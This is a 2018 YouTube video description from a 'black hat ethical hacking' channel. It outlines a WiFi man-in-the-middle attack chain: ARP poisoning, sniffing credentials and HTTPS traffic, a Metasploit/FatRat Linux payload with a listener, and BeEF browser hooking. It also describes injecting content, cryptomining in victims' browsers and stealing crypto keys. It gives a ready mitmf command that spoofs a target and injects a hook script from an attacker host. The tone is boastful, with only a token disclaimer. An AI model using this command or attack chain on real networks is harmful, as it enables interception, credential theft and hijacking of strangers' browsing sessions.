Hello Everyone,
Part 1 of 3
This is SaintDruG from blackhatethicalhacking.com
Happy New year! Been a while, i know, but the wait is worth it,
Been busy lately, but we promise, the new website launch will be
worth it soon !
Pause + Read Later.
Today will show you, how black hats, real fast, what they can do
using their skill, just time it, and each second that passes, they are actually flowing through security protocols, gathering info, so they can prepare the right tool, editing it to their need, to launch an attack.
We will show how you can by just visiting any WiFi, wherever you are,
how you can determine in seconds who is there, choose your target specifically or just poison all the
network, and show skill techniques while sniffing https traffic,
sniffing credentials, all this from an iPhone, moreover, we will
combine this attack using Beef Framework, and metasploit,
this way, we can have direct attack on the browser, and inject it
to a users session, for persistency, we will keep logs of all the traffic
and focus on what you can do to someones browsing session.
MITM, Social Engineering Techniques, requires exploiting the human brain. Its a completely different way for a black hat, when he looks at a website, They look under the hood, and search for specific things, that they know they can take advantage, and run exploits social engineering users to let them do what they want, and compromise in seconds a system, for black hats shell, is just the beginning, its post exploitation and more that they excel.
Security, is a myth...
Create A Payload for Linux
Host the Payload so that we can use it with BeeF using Social Engineering techniques
Setup a listener, and wait for the session
Post Exploitation - you OWNED the SYSTEM.
Inject Html Code into his browsing session
Inject and replace all photos with your own
Make his browser shake
Sniff all the traffic, including:
Https, Http, Mail Server, Applications that access the internet
This also means, if for example you want to determine a link
from apples itunes, or appstore, and you download an app, on your iPhone
or any device:
You can also track the direct link and start working on investigating
around that.
Sniff all the traffic and start getting an idea of what the user is browsing
to prepare your social engineering attack on Beef through the browser session.
Some use this technique to target the browser and show their users
with popups, and make them click using techniques like clickjacking
so they can vote for them, display ads they want to promote
replacing the original ones, and injecting html code, they could
also use techniques to mine crypto curency while the user
is browsing and send the hash back and get paid for it
on your behalf, so they can launch such attacks and by the end of
the day they can collect enough crypto and generate money.
They inject Websites, and use techniques such as "Waterholing"
Once you are in, its limitless the stuff you can do, based
on each ones experience, and that takes years, you can do
magic stuff, fast and strong, real strong.
Sniff, and hijack bitcoin and crypto addresses using this technique
is also possible, we will show it in another video,
how easy it is for a hacker to through browsing, get access
to your bitcoin address and private keys if it is stored on your computer.
Tools used:
FatRat
Xerosploit
metasploit
Beef Framework
Bettercap
Can be used with MITM to initiate and force someone injecting him with the hook:
mitmf -i wlan0 --spoof --arp --gateway 192.168.0.1 --target 192.168.0.24 --hsts --inject --js-url http://192.168.0.10:3000/hook.js
OS:
Kali Linux 4.14.0
Custom Black Hat Ethical Hacking Edition.
Sniffed using a Cisco Router, & iPhone 6S Latest Firmware with latest Safari Browser
Raspberry Pi3 Running Parrot OS
Want to use our conky theme on the right?
You can download it via the provided link in the comments.
Soundtrack also provided in the comments.
Hope you enjoyed it, this video is for educational purpose only.
the iPhone and the website on the iPhone, both are the property
of SaintDruG, and Blackhatethicalhacking.com
Do not use this without the conscents of someone else!
This is the New Way of Hacking: the
Black Hat // Ethical // Hacking Way.
brought to you by www.blackhatethicalhacking.com 2018
All Rights Reserved.
Sound Track:
ROYALTY FREE
Background Music For Videos Fashion Films - Dark Hip-Hop Trap [Royalty Free - Commercial Use]
Dark - Trap
Kevin MacLeod - Spellbound
Mind Trap Original Composition (Cinematic Dark Epic) Royalty Free Music
Download for Free our Conky Theme
https://github.com/blackhatethicalhacking/bheh_conky_theme
Support our work on Patreon:
https://www.patreon.com/blackhatethicalhacking
Source:
https://www.youtube.com/watch?v=OEUTkj_CtuMUploader:
Black Hat Ethical Hacking